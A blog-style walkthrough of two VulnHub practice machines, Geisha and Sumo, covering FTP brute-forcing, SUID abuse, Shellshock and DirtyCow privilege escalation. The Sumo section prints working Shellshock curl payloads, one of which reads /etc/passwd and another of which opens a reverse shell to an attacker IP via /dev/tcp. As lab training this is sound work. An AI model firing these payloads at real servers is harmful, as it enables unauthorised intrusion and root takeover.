Sumo and Geisha

I decided to do some more of the SunCSR Team boxes on VulnHub because I saw someone talking them up; I had done a couple already. It wasn’t easy though - although not for the reasons you might think.

VMWare

I used to use VMWare for my Kali but every few months it would just randomly nuke my box and I’d have to reinstall. Since I built my new PC, I only had VirtualBox and it has been seamless.

But … some of the SunCSR boxes are marked as working better with VMWare and I couldn’t get them to get an IP with VirtualBox like I normally would. So, I installed VMWare … and what a pain in the ass that turned out to be, for various reasons.

Anyway, I did Geisha with both Kali and Geisha in VMWare, then I got Sumo to run in VirtualBox. So far I can’t get BlueSky to run at all. I mean it boots okay, but I can’t connect to it.

Geisha

This will be brief. It has like 5 different HTTP ports, plus FTP (no anonymous) and SSH. While I’m enumerating the various HTTP services, I have Hydra running against FTP with a username I found on one of the pages - the passwd file is on the webserver. Despite having a vulnerable webapp on two on the ports, I can’t find the login page - suggesting it may be a red herring. Hydra finds a password for our user, and we can use this for both FTP and SSH.

Once on, base32 has the SUID bit (thanks linpeas) and we can use it to read files. I read the shadow file but can’t crack the hash; so I use it to get the root SSH key and SSH in as root; done.

Sumo

HTTP and SSH only. Web enumeration reveals a /cgi-bin directory so I add sh and cgi to my extensions:

┌──(root💀kali)-[/opt/vulnhub/sumo]
└─# feroxbuster -u http://192.168.1.104 -w /usr/share/seclists/Discovery/Web-Content/common.txt -x txt,sh,cgi

# snip
200        1l        3w        0c http://192.168.1.104/cgi-bin/test.sh
# snip

Smells like shellshock?

┌──(root💀kali)-[/opt/vulnhub/sumo]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://192.168.1.104/cgi-bin/test.sh               3 ⨯

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
# snip

Yep. Shell:

┌──(root💀kali)-[/opt/vulnhub/sumo]
└─# curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'bash -i >& /dev/tcp/192.168.1.210/1234 0>&1'" http://192.168.1.104/cgi-bin/test.sh

This box has an old kernel, and linux-exploit-suggester.sh suggests DirtyCow. This shit never works for me, but we’ll try:

www-data@ubuntu:/dev/shm$ gcc -pthread dirty.c -o dirty -lcrypt
gcc -pthread dirty.c -o dirty -lcrypt
gcc: error trying to exec 'cc1': execvp: No such file or directory

HA! I’ve seen this before:

www-data@ubuntu:/dev/shm$ export PATH=/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
www-data@ubuntu:/dev/shm$ !12
!12
gcc -pthread dirty.c -o dirty -lcrypt
www-data@ubuntu:/dev/shm$

That’s better.

www-data@ubuntu:/dev/shm$ ./dirty
./dirty
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: none

Complete line:
firefart:fixrfs1bF52dQ:0:0:pwned:/root:/bin/bash

mmap: 7f7d5602b000

It appears to have hung at this point - dammit! Let’s try another login:

┌──(root💀kali)-[/opt/vulnhub/sumo]
└─# ssh firefart@192.168.1.104                                                                                                    18 ⨯
The authenticity of host '192.168.1.104 (192.168.1.104)' can't be established.
ECDSA key fingerprint is SHA256:G8HZXu6SUrixt/obia/CUlTgdJK9JaFKXwulm6uUrbQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.104' (ECDSA) to the list of known hosts.
firefart@192.168.1.104's password: 
Welcome to Ubuntu 12.04 LTS (GNU/Linux 3.2.0-23-generic x86_64)

 * Documentation:  https://help.ubuntu.com/
New release '14.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Mon May 11 11:47:26 2020
firefart@ubuntu:~# id
uid=0(firefart) gid=0(root) groups=0(root)
firefart@ubuntu:~# cd /root
firefart@ubuntu:~# ls -lash
total 28K
4.0K drwx------  3 firefart root 4.0K May 13  2020 .
4.0K drwxr-xr-x 23 firefart root 4.0K May 11  2020 ..
4.0K -rw-------  1 firefart root   22 May 13  2020 .bash_history
4.0K -rw-r--r--  1 firefart root 3.1K Apr 19  2012 .bashrc
4.0K drwx------  2 firefart root 4.0K May 11  2020 .cache
4.0K -rw-r--r--  1 firefart root  140 Apr 19  2012 .profile
4.0K -rw-r--r--  1 firefart root   24 May 11  2020 root.txt
firefart@ubuntu:~# cat root.txt
{Sum0-SunCSR-2020_r001}
firefart@ubuntu:~#

Well there you go, I guess it does work sometimes.